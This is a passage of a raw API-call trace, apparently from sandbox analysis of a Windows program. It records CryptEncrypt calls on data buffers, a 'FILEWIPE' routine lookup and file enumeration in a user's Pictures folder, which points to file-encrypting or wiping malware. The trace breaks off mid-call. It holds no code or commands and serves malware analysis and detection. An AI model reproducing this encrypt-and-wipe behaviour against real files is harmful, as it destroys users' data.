dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.161] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0189.161] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.161] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.161] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x8f3a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x8f40) returned 1 [0189.161] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.162] CharLowerBuffW (in: lpsz="byte[36673]", cchLength=0xb | out: lpsz="byte[36673]") returned 0xb [0189.162] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.163] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.164] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.164] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.164] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc04df0*, pdwDataLen=0x87e820*=0x8f3a, dwBufLen=0x8f40 | out: pbData=0xc04df0*, pdwDataLen=0x87e820*=0x8f40) returned 1 [0189.164] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.164] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.164] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.167] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.167] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.167] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.167] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0189.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.167] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.167] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.167] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.195] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 1 [0189.196] TranslateMessage (lpMsg=0x87e98c) returned 0 [0189.196] DispatchMessageW (lpMsg=0x87e98c) returned 0x0 [0189.196] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e028) returned 1 [0189.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.196] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0189.196] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0189.196] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.197] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.197] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.197] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.197] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.197] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0189.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.201] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.201] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.202] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.206] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.206] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.206] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0189.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.206] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.206] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.206] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.206] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0189.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.207] CryptDestroyKey (hKey=0x90af18) returned 1 [0189.207] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.207] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.207] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.207] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.208] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.208] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.208] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0189.208] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0189.208] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0189.208] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.208] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.208] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.208] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.208] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0189.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.208] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.209] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0189.209] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.209] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0189.209] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.209] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.209] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.209] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.209] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.209] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.209] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0189.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.209] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.210] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.210] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0189.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0189.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0189.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0189.211] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0189.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0189.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.211] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.211] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.211] FreeLibrary (hLibModule=0x74f20000) returned 1 [0189.211] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.211] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.211] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0189.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.212] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0189.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0189.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.213] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0189.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0189.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.215] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0189.215] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0189.215] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0189.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.216] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0189.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.216] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", 